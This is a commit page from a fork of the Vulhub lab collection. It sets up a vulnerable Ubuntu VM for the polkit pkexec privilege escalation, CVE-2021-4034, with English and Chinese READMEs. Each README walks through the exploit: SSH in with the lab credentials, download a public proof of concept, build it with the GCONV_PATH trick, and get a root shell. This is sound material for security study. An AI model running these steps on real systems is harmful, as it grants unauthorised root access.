aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
polkit/CVE-2021-4034/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 73 KiB

BIN
polkit/CVE-2021-4034/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 418 KiB

95
polkit/CVE-2021-4034/README.md Normal file
View File

@@ -0,0 +1,95 @@
# Polkit's `pkexec` Local Privilege Escalation Vulnerability (CVE-2021-4034)
[中文版本(Chinese version)](README.zh-cn.md)
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. The pkexec application is a setuid tool that provided by Polkit, it is designed to allow unprivileged users to run commands as privileged users according predefined policies.
The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation giving unprivileged users administrative rights on the target machine.
References:
- https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
- https://github.com/berdav/CVE-2021-4034
## Vulnerability Environment
> Note: Linux kernel is fixed the [`argc==0` bug](https://lwn.net/Articles/882799/) in this [commit](https://github.com/torvalds/linux/commit/dcd46d897adb70d63e025f175a00a89797d31a43), so Vulhub uses a Qemu virtual machine emulator to run a vulnerable Ubuntu 20.04, that contains polkit version 0.105. It required your system have at least 2G memory to run the environment.
You can run following command to start the Ubuntu 20.04 with polkit 0.105:
```
docker compose up -d
```
Because there is a virtual server running inside Docker container, you will need to wait longer until you see the success logs using `docker compose logs -f` like that:
```
cmd_1 | [ 651.040963] cloud-init[1627]: Cloud-init v. 20.1-10-g71af48df-0ubuntu5 running 'modules:final' at Wed, 11 Jan 2023 14:57:10 +0000. Up 209.05 seconds.
cmd_1 | [ 651.046024] cloud-init[1627]: ci-info: no authorized SSH keys fingerprints found for user ubuntu.
cmd_1 | [ 651.049934] cloud-init[1627]: Cloud-init v. 20.1-10-g71af48df-0ubuntu5 finished at Wed, 11 Jan 2023 15:04:32 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 650.90 seconds
cmd_1 | [ OK ] Finished Execute cloud user/final scripts.
cmd_1 | [ OK ] Reached target Cloud-init target.
```
![](1.png)
## Exploit
Firstly, use `ubuntu/vulhub` to login the target SSH server:
```
ssh ubuntu@192.168.1.163 -p2222
```
Use [this repository](https://github.com/berdav/CVE-2021-4034) to reproduce the CVE-2021-4034:
```
ubuntu@ubuntu:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),118(lxd)
ubuntu@ubuntu:~$ cd /tmp/
ubuntu@ubuntu:/tmp$ wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
--2023-01-11 15:11:29-- https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/berdav/CVE-2021-4034/tar.gz/refs/heads/main [following]
--2023-01-11 15:11:30-- https://codeload.github.com/berdav/CVE-2021-4034/tar.gz/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 20.205.243.165
Connecting to codeload.github.com (codeload.github.com)|20.205.243.165|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/x-gzip]
Saving to: main.tar.gz
main.tar.gz [ <=> ] 4.08K --.-KB/s in 0.003s
2023-01-11 15:11:30 (1.49 MB/s) - main.tar.gz saved [4176]
ubuntu@ubuntu:/tmp$ tar -zxvf main.tar.gz
CVE-2021-4034-main/
CVE-2021-4034-main/.gitignore
CVE-2021-4034-main/LICENSE
CVE-2021-4034-main/Makefile
CVE-2021-4034-main/README.md
CVE-2021-4034-main/cve-2021-4034.c
CVE-2021-4034-main/cve-2021-4034.sh
CVE-2021-4034-main/dry-run/
CVE-2021-4034-main/dry-run/Makefile
CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
CVE-2021-4034-main/pwnkit.c
ubuntu@ubuntu:/tmp$ cd CVE-2021-4034-main/
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),118(lxd),1000(ubuntu)
```
![](2.png)
As you can see, I currently become a root user after exploits.

86
polkit/CVE-2021-4034/README.zh-cn.md Normal file
View File

@@ -0,0 +1,86 @@
# Polkit `pkexec` 权限提升漏洞CVE-2021-4034
Polkit之前名为PolicyKit是一个权限相关的套件pkexec是其中用于以其他用户身份执行命令的工具它具有suid权限。
当前版本的pkexec中没有正确处理参数和环境变量导致攻击者可以利用这个Bug劫持环境变量`GCONV_PATH`进而劫持动态链接库以root身份执行任意代码。
参考链接:
- https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
- https://github.com/berdav/CVE-2021-4034
- https://xz.aliyun.com/t/10870
## 漏洞环境
> 说明: Linux内核在这个[commit](https://github.com/torvalds/linux/commit/dcd46d897adb70d63e025f175a00a89797d31a43)中修复了[`argc==0`的Bug](https://lwn.net/Articles/882799/)而Docker环境会使用宿主机的内核所以Vulhub采用的方案是在Docker容器中运行Qemu虚拟机并在虚拟机中运行合适版本的Ubuntu操作系统。
你可以执行下面这条命令启动一个Ubuntu 20.04其中包含Polkit 0.105版本套件:
```
docker compose up -d
```
因为容器中运行了Qemu虚拟机所以初始化需要消耗更长时间。你可以使用`docker compose logs -f`查看运行时的日志,如果发现如下日志,说明初始化成功:
![](1.png)
## 漏洞利用
首先,使用`ubuntu/vulhub`作为账号密码登录目标的SSH端口是2222
```
ssh ubuntu@192.168.1.163 -p2222
```
然后使用[这个项目](https://github.com/berdav/CVE-2021-4034)来利用CVE-2021-4034
```
ubuntu@ubuntu:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),118(lxd)
ubuntu@ubuntu:~$ cd /tmp/
ubuntu@ubuntu:/tmp$ wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
--2023-01-11 15:11:29-- https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/berdav/CVE-2021-4034/tar.gz/refs/heads/main [following]
--2023-01-11 15:11:30-- https://codeload.github.com/berdav/CVE-2021-4034/tar.gz/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 20.205.243.165
Connecting to codeload.github.com (codeload.github.com)|20.205.243.165|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/x-gzip]
Saving to: main.tar.gz
main.tar.gz [ <=> ] 4.08K --.-KB/s in 0.003s
2023-01-11 15:11:30 (1.49 MB/s) - main.tar.gz saved [4176]
ubuntu@ubuntu:/tmp$ tar -zxvf main.tar.gz
CVE-2021-4034-main/
CVE-2021-4034-main/.gitignore
CVE-2021-4034-main/LICENSE
CVE-2021-4034-main/Makefile
CVE-2021-4034-main/README.md
CVE-2021-4034-main/cve-2021-4034.c
CVE-2021-4034-main/cve-2021-4034.sh
CVE-2021-4034-main/dry-run/
CVE-2021-4034-main/dry-run/Makefile
CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
CVE-2021-4034-main/pwnkit.c
ubuntu@ubuntu:/tmp$ cd CVE-2021-4034-main/
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
ubuntu@ubuntu:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),118(lxd),1000(ubuntu)
```
![](2.png)
上图可见执行提权程序后我们已经成为了root用户。

6
polkit/CVE-2021-4034/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
version: '2'
services:
cmd:
image: vulhub/polkit:0.105
ports:
- 2222:2222